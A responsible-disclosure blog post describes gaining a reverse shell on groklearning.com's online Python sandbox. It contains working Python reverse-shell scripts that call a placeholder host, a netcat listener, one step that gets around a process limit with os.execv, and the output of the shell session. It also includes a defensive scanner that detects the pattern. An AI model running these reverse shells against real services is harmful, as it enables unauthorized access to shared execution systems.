How I managed to get shell access to groklearning.com

groklearning.com provides a platform for online education where one can learn how to program in Python.

It is one of those projects that make the world better by providing free online education to people. If you are new to programming and want to learn some Python, I'd suggest you visit the groklearning.com site and take some (why not all) of the courses they have!

I've been using groklearning.com myself and have been telling friends about it who wish to learn Python but don't know where to start.

Using groklearning.com you can write your Python script, which is then executed and the result displayed back to you. This is very cool, because you don't have to carry Python around with you and can simply use it from your browser, but it also comes with a risk...

What if someone manages to make the system serve a different purpose? What if someone manages to turn it into a weapon?

In this post we are going to explore the security of groklearning.com by trying to get shell access to the systems.

DISCLAIMER: The information provided here is for educational purposes only! Any unauthorized attempts to use this information for malicious acts may be disclosed to law enforcement authorities and result in criminal prosecution!

This post was published with the permission and agreement of the Security Team at groklearning.com.

Choosing our target

The first thing I did was choose a target. I chose the Eliza course and continued from there.

NOTE: Any other course would also work as long as it provides you with a window where you could write your Python script.

Checking active processes

The first Python script I ran was one to list all active processes on the system. This would later allow me to identify any weak spots I could use for my attack.

This is the script I used:

    import subprocess

    # List every process on the box; stderr is captured so that
    # errors from /bin/ps are shown as well
    p = subprocess.Popen(['/bin/ps', '-ef'], stdout=subprocess.PIPE, stderr=subprocess.PIPE)

    print(p.stdout.read())
    print(p.stderr.read())

From the output of the above script I was able to identify a number of things about the system, such as the OS, the virtualization technology in use, etc.

Having a look around

It was time to have a look around and see what we've got on this system. I started by checking what's in /bin, /usr/bin and other directories, in order to identify anything that could be used as a weapon.

The system running my Python script had been stripped down a bit, so you won't find all the UNIX/Linux tools you usually get on a default installation of a GNU/Linux system, for example.

I used this script to list the contents of the different directories:

    import subprocess

    # Directory listing of /bin; change the path to inspect other directories
    p = subprocess.Popen(['/bin/ls', '-la', '/bin'], stdout=subprocess.PIPE, stderr=subprocess.PIPE)

    print(p.stdout.read())
    print(p.stderr.read())

Okay, the first thing I noticed was that /bin/bash was there... I thought I'd give it a try and see if I could start it.

I quickly loaded my next Python script and executed it:

    import subprocess

    p = subprocess.Popen(['/bin/bash', '--version'], stdout=subprocess.PIPE)

    print(p.stdout.read())

I wasn't really expecting much to happen, but then I got a result back, which was:

    GNU bash, version 4.2.37(1)-release (i686-pc-linux-gnu)
    Copyright (C) 2011 Free Software Foundation, Inc.
    License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>

    This is free software; you are free to change and redistribute it.
    There is NO WARRANTY, to the extent permitted by law.

Okay, now I knew I could start a shell on the remote system, but I couldn't do much with it... at least not yet.

Is outbound traffic allowed?

Time to check whether outbound traffic was allowed. If it was, I could write a Python script that would spawn a reverse shell for me and grant me access. But only if outbound traffic was allowed.

So I used this script to verify that outbound HTTP traffic is allowed:

    import socket

    # Plain TCP connection to port 80; any reply at all proves egress works
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect(("www.python.org", 80))
    s.sendall(b"GET http://www.python.org HTTP/1.0\n\n")
    print(s.recv(4096))
    s.close()

I loaded this script in Eliza and hit the run button. The result was:

    HTTP/1.1 404 Not found
    Server: Varnish
    Retry-After: 0
    content-type: text/html
    Content-Length: 77
    Accept-Ranges: bytes
    Date: Tue, 04 Mar 2014 18:13:57 GMT
    Via: 1.1 varnish
    Connection: close


    <html>
    <head>
    <title> </title>
    </head>
    <body>
    unknown domain: </body></html>

The response (a 404 from the web server, because the request carried no Host header) confirmed that outbound HTTP traffic is allowed, so I was ready to launch my first attack.

Launching the attack

I created a listener on my machine on port 80 using netcat, which I would later use for my reverse shell:

    # nc -l -p 80

The next thing I had to do was load a Python reverse shell script into groklearning.com. This is the script I used for my Python reverse shell:

    import socket
    import subprocess
    import os

    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect(('x.x.x.x', 80))

    # Attach stdin, stdout and stderr to the socket
    os.dup2(s.fileno(), 0)
    os.dup2(s.fileno(), 1)
    os.dup2(s.fileno(), 2)

    # subprocess.call() forks a child process for the shell
    p = subprocess.call(['/bin/sh', '-i'])

As soon as I fired up the Python reverse shell I was able to see the shell prompt on my netcat listener:

    # nc -l 80
    $

Then I tried executing some shell commands:

    $ ls
    /bin/sh: 1: Cannot fork
    $ pwd
    /tmp/tmphBjnv5
    $ cat /etc/passwd
    /bin/sh: 3: Cannot fork
    $ uname -a
    /bin/sh: 4: Cannot fork
    $ ^D

Unfortunately, I wasn't able to do much with my reverse shell, as there seemed to be some limits in place, so I went on to check things further on the target machine.

Checking our limits

The next thing I did was check the limits on the target system. I used the following Python script to do so:

    import subprocess

    p = subprocess.Popen(['/bin/bash', '-c', 'ulimit -a'], stdout=subprocess.PIPE)

    print(p.stdout.read())

The result I got was this:

    core file size          (blocks, -c) 0
    data seg size           (kbytes, -d) unlimited
    scheduling priority             (-e) 0
    file size               (blocks, -f) unlimited
    pending signals                 (-i) 13371
    max locked memory       (kbytes, -l) 64
    max memory size         (kbytes, -m) unlimited
    open files                      (-n) 1024
    pipe size            (512 bytes, -p) 8
    POSIX message queues     (bytes, -q) 819200
    real-time priority              (-r) 0
    stack size              (kbytes, -s) 8192
    cpu time               (seconds, -t) 3
    max user processes              (-u) 3
    virtual memory          (kbytes, -v) 102400
    file locks                      (-x) unlimited

As you can see from the above output, we were limited to just 3 user processes, which is why every command in the shell failed with "Cannot fork". Apparently I wasn't going to get my shell so easily, so I had to think up something else...

Launching the second attack

It was time to launch a second attack, but this time using os.execv() instead of subprocess.call(): execv() replaces the current process image rather than forking a new process, so the process limit does not come into play.

So I started my netcat listener again, and then used this script for my reverse shell:

    import socket
    import os

    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect(('x.x.x.x', 80))

    os.dup2(s.fileno(), 0)
    os.dup2(s.fileno(), 1)
    os.dup2(s.fileno(), 2)

    # Replace the Python interpreter itself with the shell; no fork involved
    os.execv('/bin/sh', ['-i'])

The result this time was this:

    # nc -l 80

    pwd
    /tmp/tmpEMZgWN

    ls -la
    total 4
    drwx------ 3 39540956 1002    0 Mar  4 18:22 .
    drwx--x--x 4     1001 root 4096 Mar  4 18:22 ..
    -rw------- 1 39540956 1002  263 Mar  4 18:22 program.py

    uname -a
    Linux prod-terminal00-eu-west-1 3.8.0-35-generic #50-Ubuntu SMP Tue Dec 3 01:24:59 UTC 2013 x86_64 x86_64 x86_64 GNU/Linux

    cat /etc/passwd
    root:x:0:0:root:/root:/bin/bash
    daemon:x:1:1:daemon:/usr/sbin:/bin/sh
    bin:x:2:2:bin:/bin:/bin/sh
    sys:x:3:3:sys:/dev:/bin/sh
    sync:x:4:65534:sync:/bin:/bin/sync
    games:x:5:60:games:/usr/games:/bin/sh
    man:x:6:12:man:/var/cache/man:/bin/sh
    lp:x:7:7:lp:/var/spool/lpd:/bin/sh
    mail:x:8:8:mail:/var/mail:/bin/sh
    news:x:9:9:news:/var/spool/news:/bin/sh
    uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
    proxy:x:13:13:proxy:/bin:/bin/sh
    www-data:x:33:33:www-data:/var/www:/bin/sh
    backup:x:34:34:backup:/var/backups:/bin/sh
    list:x:38:38:Mailing List Manager:/var/list:/bin/sh
    irc:x:39:39:ircd:/var/run/ircd:/bin/sh
    gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
    nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
    libuuid:x:100:101::/var/lib/libuuid:/bin/sh

    cat /etc/issue
    Ubuntu 12.10 \n \l

    whereis vi
    vi:

    cat > hello.txt <<__EOF__
    Hi, there!
    __EOF__

    cat hello.txt
    Hi, there!

    ls -la
    total 4
    drwx------ 4 39540956 1002    0 Mar  4 18:22 .
    drwx--x--x 4     1001 root 4096 Mar  4 18:23 ..
    -rw------- 1 39540956 1002   11 Mar  4 18:23 hello.txt
    -rw------- 1 39540956 1002  263 Mar  4 18:22 program.py

    cat program.py
    # Enter your code for "Interacting with Eliza" here.


    import socket
    import os

    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect(('x.x.x.x', 80))

    os.dup2(s.fileno(),0)
    os.dup2(s.fileno(),1)
    os.dup2(s.fileno(),2)

    os.execv('/bin/sh', ['-i'])

This time I got my reverse shell and gained access to the system running the groklearning.com Python code.

At this point I stopped and decided it was time to let the Security Team at groklearning.com know about the security issue.
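The pattern used in both attacks above is the same three steps: connect a socket, redirect file descriptors 0-2 onto it, and start a shell. As an added illustration from the defender's side (this is example code, not anything groklearning.com runs), the following scanner walks the AST of a submitted script and flags that combination. The constant names and the two constructed sample submissions are assumptions of this example.

```python
import ast

# Call names that make up the three steps of the reverse shell shown in this post.
# These name sets are assumptions of this example, not part of any real product.
CONNECT_CALLS = {"connect", "connect_ex"}
EXEC_CALLS = {"execv", "execve", "execvp", "execvpe", "execl", "execlp",
              "execle", "execlpe", "system", "popen"}
SUBPROCESS_CALLS = {"call", "Popen", "run", "check_call", "check_output"}


def _call_name(node):
    """Return 'attr' for obj.attr(...) and 'name' for name(...), else ''."""
    if isinstance(node.func, ast.Attribute):
        return node.func.attr
    if isinstance(node.func, ast.Name):
        return node.func.id
    return ""


def scan_submission(source):
    """Return the set of reverse-shell indicators present in a student script."""
    found = set()
    for node in ast.walk(ast.parse(source)):
        if not isinstance(node, ast.Call):
            continue
        name = _call_name(node)
        if name in CONNECT_CALLS:
            found.add("socket-connect")
        elif name == "dup2" and len(node.args) == 2:
            # dup2(fd, n) with n in 0..2 rewires stdin/stdout/stderr
            target = node.args[1]
            if isinstance(target, ast.Constant) and target.value in (0, 1, 2):
                found.add("stdio-redirect")
        elif name in EXEC_CALLS or name in SUBPROCESS_CALLS:
            found.add("shell-exec")
    return found


def is_reverse_shell_pattern(source):
    """True only when all three steps appear together."""
    return {"socket-connect", "stdio-redirect", "shell-exec"} <= scan_submission(source)


# Constructed samples: the post's second payload, and a normal Eliza-style exercise.
SAMPLE_REVERSE_SHELL = (
    "import socket\nimport os\n"
    "s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n"
    "s.connect(('x.x.x.x', 80))\n"
    "os.dup2(s.fileno(), 0)\nos.dup2(s.fileno(), 1)\nos.dup2(s.fileno(), 2)\n"
    "os.execv('/bin/sh', ['-i'])\n"
)
SAMPLE_BENIGN = "name = input('What is your name? ')\nprint('Hello, ' + name)\n"
```

A static check like this is only a signal for alerting, since the same effect can be reached without these literal names; the actual control is egress filtering and process isolation for the worker that runs student code.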

Fixing the issue

Soon after I got shell access to the system, I mailed the Security Team at groklearning.com about the issue.

Shortly after I sent the mail, one of the guys from the Security Team at groklearning.com contacted me and we had a conversation about the issue in order to identify its root cause. A bit later the security issue was fixed and creating a reverse shell was no longer possible.

Now we can all be a bit happier that groklearning.com is a bit safer than before with that security issue patched, and continues to serve its mission of educating people! :)